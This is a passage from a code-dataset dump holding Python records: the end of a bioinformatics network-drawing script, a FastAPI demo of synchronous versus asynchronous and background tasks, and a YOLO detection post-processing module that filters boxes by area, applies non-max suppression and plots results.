part[i] != net[6]:\r\n\t\t\t\tnode2 = part[i]\r\n\t\tprint(' %s--%s' % (net[0], node1))\r\n\t\tprint(' | |')\r\n\t\tprint('%s--%s--%s' % (net[1], net[6], net[7]))\r\n\t\tprint(' | | |')\r\n\t\tprint('%s--%s--%s' % (node2, net[8], net[9]))\r\n\t\t'''\r\n\t\tprint(' \\t%s\\t%s' % (net[0], node1))\r\n\t\tprint('%s\\t%s\\t%s' % (net[1], net[6], net[7]))\r\n\t\tprint('%s\\t%s\\t%s' % (node2, net[8], net[9]))\r\n\t\t'''\r\n\t\tprint('\\n')\r\n\r\ndef Function4():\r\n\tstorelist = Function2(False)\r\n\tsquares = []\r\n\tfor pairs in storelist:\r\n\t\tsquares.append(OneSquare(pairs))\r\n\tfor i in range(len(squares)):\r\n\t\tsq1 = squares[i]\r\n\t\tfor j in range(i + 1, len(squares)):\r\n\t\t\tsq2 = squares[j]\r\n\t\t\tif sq2.n0 == sq1.n1:\r\n\t\t\t\tif sq1.n3 not in (sq2.n1, sq2.n2):\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t#elif sq1.n3 == sq2.n1:\r\n\t\t\t\t#\tsquares[j] = sq2 = sq2.trans()\r\n\t\t\t\tsq1.right.append(sq2)\r\n\t\t\t\tsq2.left.append(sq1)\r\n\t\t\telif sq2.n0 == sq1.n2:\r\n\t\t\t\tif sq1.n3 not in (sq2.n1, 
sq2.n2):\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t#elif sq1.n3 == sq2.n2:\r\n\t\t\t\t#\tsquares[j] = sq2 = sq2.trans()\r\n\t\t\t\tsq1.down.append(sq2)\r\n\t\t\t\tsq2.up.append(sq1)\r\n\tsquares = list(filter(lambda x: x.right + x.left + x.up + x.down != [], squares))\r\n\treturn squares\r\n\t\r\ndef Function5():\r\n\tsquares = Function4()\r\n\ttry:\r\n\t\tg = pgv.AGraph()\r\n\t\tfor square in squares:\r\n\t\t\tg.add_node(square.detail(False, True))\r\n\t\tfor square in squares:\r\n\t\t\tfor value in square.right + square.down:\r\n\t\t\t\tif value.n0 == square.n1:\r\n\t\t\t\t\tif value.n2 == square.n3:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'red')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'orange')\r\n\t\t\t\telse:\r\n\t\t\t\t\tif value.n1 == square.n3:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'blue')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'green')\r\n\t\t\t''':\r\n\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'red')\r\n\t\t\tfor value in square.down:\r\n\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'blue')\r\n\t\t\t\t'''\r\n\t\tg.layout('dot')\r\n\t\tg.draw('SquareNet.png')\r\n\texcept:\r\n\t\tprint('\\n\\n\\n\\n\\nPlease run in Linux-Bioinformatics\\n\\n\\n\\n\\n')\r\n\r\n#Function0(default err = 0.3, fulltable = False) = changeProteinNode\r\n#Function1 = printNodeTree1\r\n#Function2(default WRITE = True) = changeProteinNode2\r\n#Function3 = makeNet\r\n#Function4 = squareMakeNet\r\n#Function5 = printSquareNet\r\nFunction0()\r\nFunction5()","sub_path":"Bioinformatics/Lesson2/4-4-1-Try2.py","file_name":"4-4-1-Try2.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"13087839","text":"\nimport asyncio\nimport time\nfrom datetime import datetime\n\nfrom fastapi import BackgroundTasks, FastAPI\n\napp = FastAPI()\n\n\ndef slow_stuff_sync(seconds: int, i: int):\n    print(f'{datetime.now().time()} start slow stuff sync, call {i}')\n    time.sleep(seconds)\n    print(f'{datetime.now().time()} end slow stuff sync, call {i}')\n\n\nasync def slow_stuff_async(seconds: int, i: int):\n    print(f'{datetime.now().time()} start slow stuff async, call {i}')\n    await asyncio.sleep(seconds)\n    print(f'{datetime.now().time()} end slow stuff async, call {i}')\n\n\n@app.get(\"/\")\ndef root():\n    return {\"Hello\": \"World\"}\n\n\n@app.get(\"/perform_synchronous/\")\ndef perform_synchronous(n: int, seconds_sleep: int):\n    start = time.time()\n\n    [slow_stuff_sync(seconds_sleep, i) for i in range(n)]\n    print('after calling slow_stuff_sync')\n\n    end = time.time()\n    return {\"total_seconds\": end-start}\n\n\n@app.get(\"/perform_asynchronous/\")\nasync def perform_asynchronous(n: int, seconds_sleep: int):\n    start = time.time()\n\n    [await slow_stuff_async(seconds_sleep, i) for i in range(n)]\n    print('after calling slow_stuff_async')\n\n    end = time.time()\n    return {\"total_seconds\": end - start}\n\n\n@app.get(\"/perform_background_tasks/\")\nasync def perform_background_tasks(n: int, seconds_sleep: int,\n                                   background_tasks: BackgroundTasks):\n    start = time.time()\n\n    # to be run after returning a response\n    [background_tasks.add_task(slow_stuff_async, seconds_sleep, i) for i in range(n)]\n    print('background_tasks set')\n\n    end = time.time()\n    
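# note: BackgroundTasks run only after the response has been sent, so this\n    # handler returns almost immediately even for large n * seconds_sleep;\n    # /perform_asynchronous above, by contrast, awaits each sleep in turn and\n    # takes roughly n * seconds_sleep in total.\n    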
return {\"total_seconds\": end-start}\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540976935","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport csv\nimport cv2\nimport sys\nimport os\nimport threading\nimport re\nimport shutil\n\nfrom memory_profiler import profile\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(current_path)\n\n\ndef get_global_coords(row):\n \"\"\"Get global coords of bounding box prediction from dataframe row\n #columns:Index([u'Loc_Tmp', u'Prob', u'Xmin', u'Ymin', u'Xmax', u'Ymax', u'Category', u'Image_Root_Plus_XY',\n u'Image_Root', u'Slice_XY', u'Upper', u'Left', u'Height', u'Width', u'Pad_Height', u'Pad_Width', u'Image_Path']\n \"\"\"\n\n# with iterrows\n # xmin_tmp, xmax_tmp = row['Xmin'], row['Xmax']\n # ymin_tmp, ymax_tmp = row['Ymin'], row['Ymax']\n # upper, left = row['Upper'], row['Left']\n # sliceHeight, sliceWidth = row['Height'], row['Width']\n # vis_w, vis_h = row['Im_Width'], row['Im_Height']\n # padHeight = row['Pad_Height']\n # padWidth = row['Pad_Width']\n# with itertuples\n xmin_tmp, xmax_tmp = row.Xmin, row.Xmax\n ymin_tmp, ymax_tmp = row.Ymin, row.Ymax\n upper, left = row.Upper, row.Left\n # sliceHeight, sliceWidth = row.Height, row.Width\n vis_w, vis_h = row.Im_Width, row.Im_Height\n padHeight = row.Pad_Height\n padWidth = row.Pad_Width\n\n # for aspect ratio\n # if ((float)dx / dy > max_aspect_ratio) or ((float)dy / dx > max_aspect_ratio):\n # print (\"High aspect ratio, skipping\", row, \"...\")\n # return [], []\n # set min, max x and y for each box, shifted for appropriate padding\n xmin = max(0, int(round(float(xmin_tmp)))+left - padWidth)\n xmax = min(vis_w - 1, int(round(float(xmax_tmp)))+left - padWidth)\n ymin = max(0, int(round(float(ymin_tmp)))+upper - padHeight)\n ymax = min(vis_h - 1, int(round(float(ymax_tmp)))+upper - padHeight)\n\n # set bounds, coords\n bounds = [xmin, xmax, ymin, ymax]\n coords = [[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]]\n \n # check that nothing is negative\n if np.min(bounds) < 0:\n print(\"skipping as bound is < 0:\", row)\n return [], [] # skip these boxes\n if (xmax > vis_w) or (ymax > vis_h):\n print(\"skipping as bound is > image size:\", row)\n return [], [] # skip these boxes\n return bounds, coords\n\n\ndef augment_dataframe(df, valid_img_dir_tot='', slice_sizes=[608], valid_slice_sep='__', verbose=False):\n \"\"\"\n Add columns to dataframe\n input columns are:\n ['Loc_Tmp', 'Prob','Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category']\n output columns:\n ['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category', 'Image_Root_Plus_XY', 'Image_Root', 'Slice_XY',\n 'Upper', 'Left','Height', 'Width', 'Pad_Height', 'Pad_Width', 'Image_Path']\n \"\"\"\n\n t0 = time.time()\n print(\"Augmenting dataframe of initial length:\", len(df), \"...\")\n # extract image root\n df['Image_Root_Plus_XY'] = [f.split('/')[-1] for f in df['Loc_Tmp']]\n\n # parse out image root and location\n im_roots, im_locs = [], []\n for j, f in enumerate(df['Image_Root_Plus_XY'].values):\n ext = f.split('.')[-1]\n # get im_root, (if not slicing ignore '|')\n if slice_sizes[0] > 0:\n im_root_tmp = f.split(valid_slice_sep)[0]\n xy_tmp = f.split(valid_slice_sep)[-1]\n else:\n im_root_tmp, xy_tmp = f, '0_0_0_0_0_0_0_0'\n if im_root_tmp == 
xy_tmp:\n xy_tmp = '0_0_0_0_0_0_0_0'\n im_locs.append(xy_tmp) \n \n if '.' not in im_root_tmp:\n im_roots.append(im_root_tmp + '.' + ext)\n else:\n im_roots.append(im_root_tmp)\n \n if verbose:\n print(\"loc_tmp[:3]\", df['Loc_Tmp'].values[:3])\n print(\"im_roots[:3]\", im_roots[:3])\n print(\"im_locs[:3]\", im_locs[:3])\n\n df['Image_Root'] = im_roots\n df['Slice_XY'] = im_locs\n # get positions\n df['Upper'] = [float(sl.split('_')[0]) for sl in df['Slice_XY'].values]\n df['Left'] = [float(sl.split('_')[1]) for sl in df['Slice_XY'].values]\n df['Height'] = [float(sl.split('_')[2]) for sl in df['Slice_XY'].values]\n df['Width'] = [float(sl.split('_')[3]) for sl in df['Slice_XY'].values]\n df['Pad_Height'] = [float(sl.split('_')[4].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Pad_Width'] = [float(sl.split('_')[5].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Im_Width'] = [float(sl.split('_')[6].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Im_Height'] = [float(sl.split('_')[7].split('.')[0]) for sl in df['Slice_XY'].values]\n\n # set image path, make sure the image exists\n im_paths_list = []\n im_roots_update = []\n for img_root in df['Image_Root'].values:\n # get image path\n im_path = os.path.join(valid_img_dir_tot, img_root.strip())\n if os.path.exists(im_path):\n im_roots_update.append(os.path.basename(im_path))\n im_paths_list.append(im_path)\n # if file doesn't exist, check other extensions\n else:\n found = False\n valid_extension_list = ['.jpg', '.JPG', '.png', '.tif', '.TIF', '.TIFF', '.tiff', '.JPEG', '.jpeg']\n for ext in valid_extension_list:\n im_path_tmp = im_path.split('.')[0] + ext\n if os.path.exists(im_path_tmp):\n im_roots_update.append(os.path.basename(im_path_tmp))\n im_paths_list.append(im_path_tmp)\n found = True\n break\n if not found:\n print(\"image path not found with valid extensions:\", im_path)\n # update columns\n df['Image_Path'] = im_paths_list\n df['Image_Root'] = im_roots_update\n\n # df['Image_Path'] = [os.path.join(valid_img_dir_tot, f.strip()) for f in df['Image_Root'].values]\n bad_ids = []\n # add in global location of each row\n # if slicing, get global location from filename\n if slice_sizes[0] > 0:\n x_min_tmp, x_max_tmp, y_min_tmp, y_max_tmp = [], [], [], []\n for row in df.itertuples():\n #for index, row in df.iterrows():\n bounds, coords = get_global_coords(row)\n if len(bounds) == 0 and len(coords) == 0:\n bad_ids.append(row.index)\n [xmin, xmax, ymin, ymax] = 0, 0, 0, 0\n else:\n [xmin, xmax, ymin, ymax] = bounds\n x_min_tmp.append(xmin)\n x_max_tmp.append(xmax)\n y_min_tmp.append(ymin)\n y_max_tmp.append(ymax)\n df['Xmin_Glob'] = x_min_tmp\n df['Xmax_Glob'] = x_max_tmp\n df['Ymin_Glob'] = y_min_tmp\n df['Ymax_Glob'] = y_max_tmp\n # if not sliced, global coordinates are equivalent to local coordinates\n else:\n df['Xmin_Glob'] = df['Xmin'].values\n df['Xmax_Glob'] = df['Xmax'].values\n df['Ymin_Glob'] = df['Ymin'].values\n df['Ymax_Glob'] = df['Ymax'].values\n\n # remove bad_ids\n if len(bad_ids) > 0:\n print(\"removing empty:\", bad_ids)\n df = df.drop(df.index[bad_ids])\n\n print(\"Time to augment dataframe of length:\", len(df), \" took \", time.time() - t0, \"seconds\")\n return df\n\n\ndef yolo_output_to_df(yolo_valid_classes_files, log_file, valid_img_dir_tot='',\n slice_sizes=[608], valid_slice_sep='__', min_retain_prob=1.0):\n \"\"\"\n take output files and create df\n # df.columns:\n # ['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category', 'Image_Root_Plus_XY', 'Image_Root',\n # 'Slice_XY', 'Upper', 
'Left', 'Height', 'Width', 'Pad_Height', 'Pad_Width', 'Image_Path']\n    \"\"\"\n    df_final = []\n    for i, vfile in enumerate(yolo_valid_classes_files):\n\n        valid_base_string = '\"valid_file: ' + str(vfile) + '\\n\"'\n        print(valid_base_string[1:-2])\n        if log_file is not None:\n            print_to_log(valid_base_string, log_file)\n        \n        cat = vfile.split('/')[-1].split('.')[0]\n        # load into dataframe\n        df = pd.read_csv(vfile, sep=' ', names=['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax'])\n        # set category\n        df['Category'] = len(df) * [cat]\n\n        # remove low probabilities:\n        bad_ids = df[df['Prob'] < min_retain_prob].index\n        if len(bad_ids) > 0:\n            print(\"bad ids:\", bad_ids)\n            df.drop(df.index[bad_ids], inplace=True)\n\n        # keep only first 5 images:\n        #df = df[df['Loc_Tmp'].str.contains(\"100000|100001|100002|100003|100004|100005\")]\n\n        # augment\n        df = augment_dataframe(df, valid_img_dir_tot=valid_img_dir_tot, slice_sizes=slice_sizes,\n                               valid_slice_sep=valid_slice_sep)\n\n        # append to total df\n        if i == 0:\n            df_final = df\n        else:\n            df_final = df_final.append(df, ignore_index=True)\n    return df_final\n\n\ndef print_to_log(message, log_file, append=True):\n    if append:\n        os.system('echo ' + message + ' >> ' + log_file)\n    else:\n        os.system('echo ' + message + ' > ' + log_file)\n\n\ndef non_max_suppression(boxes, probs=None, overlapThresh=0.5):\n    \"\"\"\n    Non max suppression (assume boxes = [[xmin, ymin, xmax, ymax, ...\\\n    sometimes extra cols are: filename, v, prob, color]]\n    # http://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/\n    # Malisiewicz et al.\n    see modular_sliding_window.py, functions non_max_suppression, \\\n    non_max_supression_rot\n    \"\"\"\n    \n    # if there are no boxes, return an empty list\n    if len(boxes) == 0:\n        return [], [], []\n    \n    boxes_tot = boxes\n    boxes = np.asarray([b[:4] for b in boxes])\n\n    # if the bounding boxes integers, convert them to floats --\n    # this is important since we'll be doing a bunch of divisions\n    if boxes.dtype.kind == \"i\":\n        boxes = boxes.astype(\"float\")\n    \n    # initialize the list of picked indexes \n    pick = []\n    \n    # grab the coordinates of the bounding boxes\n    x1 = boxes[:, 0]\n    y1 = boxes[:, 1]\n    x2 = boxes[:, 2]\n    y2 = boxes[:, 3]\n\n    # compute the area of the bounding boxes and sort the bounding\n    # boxes by the bottom-right y-coordinate of the bounding box\n    area = (x2 - x1 + 1) * (y2 - y1 + 1)\n    ids = y2\n    # if probabilities are provided, sort on them instead\n    if probs is not None:\n        ids = probs\n    ids = np.argsort(ids)\n\n    # keep looping while some indexes still remain in the indexes\n    # list\n    while len(ids) > 0:\n        # grab the last index in the indexes list and add the\n        # index value to the list of picked indexes\n        last = len(ids) - 1\n        i = ids[last]\n        pick.append(i)\n\n        # find the largest (x, y) coordinates for the start of\n        # the bounding box and the smallest (x, y) coordinates\n        # for the end of the bounding box\n        xx1 = np.maximum(x1[i], x1[ids[:last]])\n        yy1 = np.maximum(y1[i], y1[ids[:last]])\n        xx2 = np.minimum(x2[i], x2[ids[:last]])\n        yy2 = np.minimum(y2[i], y2[ids[:last]])\n        \n        # compute the width and height of the bounding box\n        w = np.maximum(0, xx2 - xx1 + 1)\n        h = np.maximum(0, yy2 - yy1 + 1)\n        \n        # compute the ratio of overlap\n        overlap = (w * h) / area[ids[:last]]\n\n        # delete all indexes from the index list that have overlap above the threshold\n        np_where = np.where((overlap > overlapThresh)\n                            #| ((x1[i] <= x1[ids[:last]]) & (x2[i] >= x2[ids[:last]]))# & (overlap > 0.1))\n                            #| ((y1[i] <= y1[ids[:last]]) & (y2[i] >= y2[ids[:last]]))# & 
(overlap > 0.1))\n )\n conc = np.concatenate(([last], np_where[0]))\n ids = np.delete(ids, conc)\n\n # return only the bounding boxes that were picked using the\n # integer data type\n outboxes = boxes[pick].astype(\"int\")\n outboxes_tot = [boxes_tot[itmp] for itmp in pick]\n return outboxes, outboxes_tot, pick # pick3\n'''\n pick2 = []\n # now iterate through chosen boxes and see if they overlap\n boxes2 = np.asarray([b[:4] for b in outboxes])\n\n # if the bounding boxes integers, convert them to floats --\n # this is important since we'll be doing a bunch of divisions\n if boxes2.dtype.kind == \"i\":\n boxes2 = boxes2.astype(\"float\")\n\n # grab the coordinates of the bounding boxes\n x1 = boxes2[:, 0]\n y1 = boxes2[:, 1]\n x2 = boxes2[:, 2]\n y2 = boxes2[:, 3]\n\n # compute the area of the bounding boxes and sort the bounding\n # boxes by the bottom-right y-coordinate of the bounding box\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n ids = area\n ids = np.argsort(area)\n\n # keep looping while some indexes still remain in the indexes\n # list\n while len(ids) > 0:\n # grab the last index in the indexes list and add the\n # index value to the list of picked indexes\n last = len(ids) - 1\n i = ids[last]\n pick2.append(i)\n\n x1t = x1[i]\n x2t = x2[i]\n y1t = y1[i]\n y2t = y2[i]\n # find the largest (x, y) coordinates for the start of\n # the bounding box and the smallest (x, y) coordinates\n # for the end of the bounding box\n xx1 = np.maximum(x1[i], x1[ids[:last]])\n yy1 = np.maximum(y1[i], y1[ids[:last]])\n xx2 = np.minimum(x2[i], x2[ids[:last]])\n yy2 = np.minimum(y2[i], y2[ids[:last]])\n\n # compute the width and height of the bounding box\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n # compute the ratio of overlap\n overlap = (w * h) / area[ids[:last]]\n\n np_wherex = np.where((x1[i] <= x1[ids[:last]]) & (x2[i] >= x2[ids[:last]]) & (overlap > 0.1))\n np_wherey = np.where((y1[i] <= y1[ids[:last]]) & (y2[i] >= y2[ids[:last]]) & (overlap > 0.1))\n conc = np.concatenate(([last], np_wherex[0], np_wherey[0]))\n ids = np.delete(ids, conc)\n\n # return only the bounding boxes that were picked using the\n # integer data type\n #pick3 = [pick[i] for i in pick2]\n #outboxes = boxes[pick3].astype(\"int\")\n #outboxes_tot = [boxes_tot[itmp] for itmp in pick3]\n\n mask = np.ones(len(pick), np.bool)\n mask[pick2] = 0\n pick4 = np.array(pick)[mask]\n return outboxes, outboxes_tot, pick4#pick3\n'''\n\n\"\"\"Plot bounding boxes stored in dataframe should GROUP BY category prior to NMS so that Cars can be on top of\ntrucks, vehicles could overlap\"\"\"\ndef refine_df(df, groupby='Loc_Tmp', groupby_cat='Category', nms_overlap_thresh=0.5, plot_thresh=0.5,\n verbose=True, nms_ignore_categories=True):\n print(\"Running refine_df()...\")\n t0 = time.time()\n\n # group by image, and plot\n group = df.groupby(groupby)\n count = 0\n print_iter = 1\n df_ids_tot = []\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\"num boxes:\", len(data_all_classes))\n\n if nms_ignore_categories:\n data = data_all_classes\n df_ids = data.index.values\n # classes_str = np.array(len(data) * [class_str])\n scores = data['Prob'].values\n\n xmins = data['Xmin_Glob'].values\n ymins = data['Ymin_Glob'].values\n xmaxs = data['Xmax_Glob'].values\n ymaxs = data['Ymax_Glob'].values\n\n # filter out low probs and bbx areas not between min and max area\n min_area 
= 0\n max_area = 9000\n file_name_img = os.path.splitext(os.path.basename(img_loc_string))[0]\n img_num = int(re.sub(\"[^0-9]\", \"\", file_name_img))\n\n if img_num < 101430:\n min_area = 6000\n max_area = 51240\n elif img_num < 101510:\n min_area = 5500\n max_area = 31000\n elif img_num < 101572:\n min_area = 3900\n max_area = 31000\n elif img_num < 103516:\n min_area = 2500\n max_area = 15000\n elif img_num < 104086:\n min_area = 2400\n max_area = 30000\n elif img_num < 104442:\n min_area = 2600\n max_area = 30000\n elif img_num < 104566:\n min_area = 2000\n max_area = 8000\n elif img_num < 105400:\n min_area = 1250\n max_area = 7000\n elif img_num < 106874:\n min_area = 1250\n max_area = 7000\n # to check\n elif img_num < 107164:\n min_area = 1800\n max_area = 12000\n elif img_num < 107735:\n min_area = 2800\n max_area = 15000\n # skip from 107735 to 108443\n elif img_num < 108443:\n continue\n elif img_num < 109061:\n continue\n elif img_num < 110461:\n min_area = 7000\n max_area = 25000\n elif img_num < 110931:\n min_area = 5000\n max_area = 25000\n elif img_num < 114075:\n min_area = 3100\n max_area = 25000\n elif img_num < 114699:\n min_area = 1000\n max_area = 8000\n elif img_num < 116479:\n min_area = 600\n max_area = 7000\n elif img_num < 116651:\n continue\n elif img_num < 117309:\n min_area = 2600\n max_area = 14000\n elif img_num < 117700:\n min_area = 1000\n max_area = 40000\n elif img_num < 118053:\n min_area = 650\n max_area = 10000\n elif img_num < 118556:\n min_area = 600\n max_area = 10000\n elif img_num < 118714:\n min_area = 1000\n max_area = 50000\n elif img_num < 118905:\n min_area = 1400\n max_area = 10000\n elif img_num < 120859:\n min_area = 2000\n max_area = 10000\n elif img_num < 121356:\n min_area = 2000\n max_area = 15000\n elif img_num < 122174:\n min_area = 2000\n max_area = 15000\n elif img_num < 122757:\n min_area = 20000\n max_area = 40000\n elif img_num < 122856:\n min_area = 10000\n max_area = 40000\n elif img_num < 123118:\n min_area = 7000\n max_area = 30000\n #else:\n # break\n\n area = (xmaxs - xmins) * (ymaxs - ymins)\n high_prob_ids = np.where((scores >= plot_thresh) & ((area > min_area) & (area < max_area)))\n # only elements that where removed:\n # high_prob_ids = np.where((scores >= plot_thresh) & ((area < min_area) | (area > max_area)))\n scores = scores[high_prob_ids]\n # classes_str = classes_str[high_prob_ids]\n xmins = xmins[high_prob_ids]\n xmaxs = xmaxs[high_prob_ids]\n ymins = ymins[high_prob_ids]\n ymaxs = ymaxs[high_prob_ids]\n # probs = scores[high_prob_ids]\n df_ids = df_ids[high_prob_ids]\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n if verbose:\n print(\"boxes length:\", len(boxes))\n\n # NMS\n if nms_overlap_thresh > 0:\n boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n _, _, good_ids = non_max_suppression(boxes_nms_input, scores, overlapThresh=nms_overlap_thresh)\n if verbose:\n print(\"num boxes_all:\", len(xmins))\n print(\"num good_ids:\", len(good_ids))\n boxes = boxes[good_ids]\n scores = scores[good_ids]\n df_ids = df_ids[good_ids]\n # classes = classes_str[good_ids]\n\n df_ids_tot.extend(df_ids)\n count += len(df_ids)\n else:\n # groupby category as well so that detections can be overlapping of\n # different categories (i.e.: a car on a truck)\n group2 = data_all_classes.groupby(groupby_cat)\n for j, g2 in enumerate(group2):\n\n class_str = g2[0]\n data = g2[1]\n df_ids = data.index.values\n scores = data['Prob'].values\n\n if (i % print_iter) == 0 and verbose:\n print(\"Category:\", 
class_str)\n                    print(\"num boxes:\", len(data))\n\n                xmins = data['Xmin_Glob'].values\n                ymins = data['Ymin_Glob'].values\n                xmaxs = data['Xmax_Glob'].values\n                ymaxs = data['Ymax_Glob'].values\n\n                # filter out low probs\n                high_prob_ids = np.where(scores >= plot_thresh)\n                scores = scores[high_prob_ids]\n                xmins = xmins[high_prob_ids]\n                xmaxs = xmaxs[high_prob_ids]\n                ymins = ymins[high_prob_ids]\n                ymaxs = ymaxs[high_prob_ids]\n                df_ids = df_ids[high_prob_ids]\n                # probs = scores[high_prob_ids]\n                # classes_str = classes_str[high_prob_ids]\n\n                boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n                if verbose:\n                    print(\"len boxes:\", len(boxes))\n\n                # NMS\n                if nms_overlap_thresh > 0:\n                    # Try nms with pyimagesearch algorithm\n                    # assume boxes = [[xmin, ymin, xmax, ymax, ...\n                    boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n                    _, _, good_ids = non_max_suppression(boxes_nms_input, scores, overlapThresh=nms_overlap_thresh)\n                    if verbose:\n                        print(\"num good_ids:\", len(good_ids))\n                    boxes = boxes[good_ids]\n                    scores = scores[good_ids]\n                    df_ids = df_ids[good_ids]\n                    # classes = classes_str[good_ids]\n\n                df_ids_tot.extend(df_ids)\n                count += len(df_ids)\n\n    # print (\"len df_ids_tot:\", len(df_ids_tot))\n    df_ids_tot_final = np.unique(df_ids_tot)\n    # print (\"len df_ids_tot unique:\", len(df_ids_tot))\n\n    # create dataframe\n    if verbose:\n        print(\"df ids:\", df.index)\n        print(\"df_ids_tot_final:\", df_ids_tot_final)\n    df_out = df.loc[df_ids_tot_final]\n\n    print(\"Initial length:\", len(df), \"Final length:\", len(df_out))\n    print(\"Time to run refine_df():\", time.time() - t0, \"seconds\")\n    return df_out\n\n\n#@profile\ndef plot_thread(i, g, all_valid_img_no_ext, outdir, plot_thresh, print_iter, verbose, color_dict, show_labels,\n                alpha_scaling, plot_line_thickness):\n    img_loc_string = g[0]\n    data_all_classes = g[1]\n\n    # image_root = data_all_classes['Image_Root'].values[0]\n    im_root = os.path.basename(img_loc_string)\n    if im_root in all_valid_img_no_ext:\n        all_valid_img_no_ext.remove(im_root) # remove seen images\n\n    im_root_no_ext, ext = im_root.split('.')\n    outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' 
+ ext)\n\n if os.path.isfile(outfile):\n # already plotted\n return\n\n if (i % print_iter) == 0 and verbose:\n print(\" num boxes:\", len(data_all_classes))\n\n xmins = data_all_classes['Xmin_Glob'].values\n ymins = data_all_classes['Ymin_Glob'].values\n xmaxs = data_all_classes['Xmax_Glob'].values\n ymaxs = data_all_classes['Ymax_Glob'].values\n classes = data_all_classes['Category']\n scores = data_all_classes['Prob']\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n image = cv2.imread(img_loc_string, 1)\n plot_rects(image, boxes, scores, classes=classes,\n plot_thresh=plot_thresh,\n color_dict=color_dict, # colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n\n#@profile\ndef plot_refined_df(df, valid_ims_list, valid_img_dir_tot, groupby='Loc_Tmp', label_map_dict={},\n outdir='', plot_thresh=0.5,\n show_labels=True, alpha_scaling=True, plot_line_thickness=2,\n legend_root='colormap_legend.png',\n plot=True, print_iter=1,\n verbose=True):\n if not plot:\n return\n \"\"\"Plot refined dataframe\"\"\"\n # save images to separate folder than txt files:\n #outdir = os.path.join(outdir, 'img_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_inv_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_inv2_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_filt_' + str(plot_thresh))\n outdir = os.path.join(outdir, 'img_wthPck' + str(plot_thresh))\n if os.path.exists(outdir):\n # comment this to keep directory\n shutil.rmtree(outdir)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n print(\"Running plot_refined_df...\")\n t0 = time.time()\n # get colormap, if plotting\n outfile_legend = os.path.join(outdir, legend_root)\n colormap, color_dict = init_colors_legend(outfile_legend, label_map_dict)\n\n # group by image, and plot\n group = df.groupby(groupby)\n\n # get all images list:\n all_valid_img_no_ext = valid_ims_list\n\n jobs = []\n for i, g in enumerate(group):\n # split data\n thread = threading.Thread(target=plot_thread,\n args=(i, g, all_valid_img_no_ext, outdir, plot_thresh, print_iter, verbose,\n color_dict, show_labels, alpha_scaling, plot_line_thickness))\n jobs.append(thread)\n\n # Start the threads\n threads = 4\n counter = 0\n thread_tasks_split = [jobs[i:i + threads] for i in range(0, len(jobs), threads)]\n while thread_tasks_split:\n tasks = thread_tasks_split.pop(0)\n for t in tasks:\n t.start()\n for t in tasks:\n t.join()\n counter = counter + 4\n print(\"Done plotting: \" + str(counter) + \"/\" + str(len(jobs)))\n\n #for tasks in thread_tasks_split:\n # for t in tasks:\n # t.start()\n # for t in tasks:\n # t.join()\n # counter = counter + 4\n\n print(\"Bounding boxes plotting complete!!!!!\")\n # ------\n '''\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n image = cv2.imread(img_loc_string, 1)\n \n #image_root = data_all_classes['Image_Root'].values[0]\n im_root = os.path.basename(img_loc_string)\n if im_root in all_valid_img_no_ext:\n all_valid_img_no_ext.remove(im_root) # remove seen images\n\n im_root_no_ext, ext = im_root.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' 
